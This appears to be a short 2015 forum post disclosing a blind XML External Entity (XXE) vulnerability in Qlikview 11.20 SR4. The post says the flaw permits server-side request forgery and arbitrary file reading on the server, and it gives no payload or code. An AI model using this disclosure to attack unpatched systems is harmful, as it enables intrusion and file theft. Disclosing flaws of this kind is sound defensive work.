Qlikview 11.20 SR4 Blind XXE Injection
Posted by deepcore on September 10, 2015 – 4:15 am
The Qlikview platform is vulnerable to XML External Entity (XXE) vulnerabilities. More specifically, the platform is susceptible to DTD parameter injections, which are also “blind” as the server feeds back no visual response. These vulnerabilities can be exploited to force Server Side Request Forgeries (SSRF)in multiple protocols, as well as reading and extracting arbitrary files on the server directly. Version 11.20 SR4 is vulnerable.
Post a reply
You must be logged in to post a comment.